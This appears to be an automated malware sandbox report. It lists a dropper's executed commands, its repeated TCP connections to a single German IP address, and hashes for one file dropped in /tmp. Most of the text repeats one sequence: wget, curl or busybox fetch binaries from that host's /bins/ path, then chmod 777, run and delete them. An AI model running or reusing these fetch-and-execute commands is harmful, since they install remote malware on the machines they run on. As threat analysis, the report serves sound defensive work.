[./yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/bin/rm

[rm yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/usr/bin/wget

[wget http://87.120.84.230/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/bin/chmod

[chmod 777 xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm

[./xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/bin/rm

[rm xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/usr/bin/wget

[wget http://87.120.84.230/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/bin/chmod

[chmod 777 uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ

[./uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/bin/rm

[rm uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/usr/bin/wget

[wget http://87.120.84.230/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/bin/chmod

[chmod 777 sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv

[./sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/bin/rm

[rm sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/usr/bin/wget

[wget http://87.120.84.230/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/bin/chmod

[chmod 777 ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8

[./ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/bin/rm

[rm ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/usr/bin/wget

[wget http://87.120.84.230/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/bin/chmod

[chmod 777 yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj

[./yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/bin/rm

[rm yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/usr/bin/wget

[wget http://87.120.84.230/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/bin/chmod

[chmod 777 SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z

[./SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/bin/rm

[rm SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/usr/bin/wget

[wget http://87.120.84.230/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/bin/chmod

[chmod 777 nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO

[./nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/bin/rm

[rm nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/usr/bin/wget

[wget http://87.120.84.230/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/bin/chmod

[chmod 777 PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S

[./PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/bin/rm

[rm PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/usr/bin/wget

[wget http://87.120.84.230/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/bin/chmod

[chmod 777 hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME

[./hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/bin/rm

[rm hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/usr/bin/wget

[wget http://87.120.84.230/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/bin/chmod

[chmod 777 8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV

[./8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/bin/rm

[rm 8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/usr/bin/wget

[wget http://87.120.84.230/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/bin/chmod

[chmod 777 TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH

[./TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/bin/rm

[rm TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/usr/bin/wget

[wget http://87.120.84.230/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/bin/chmod

[chmod 777 fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal

[./fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/bin/rm

[rm fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/usr/bin/wget

[wget http://87.120.84.230/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/bin/chmod

[chmod 777 WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V

[./WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/bin/rm

[rm WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/usr/bin/wget

[wget http://87.120.84.230/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

/bin/chmod

[chmod 777 Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

/tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS

[./Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

/bin/rm

[rm Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

Network

Country Destination Domain Proto
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp

Files

/tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97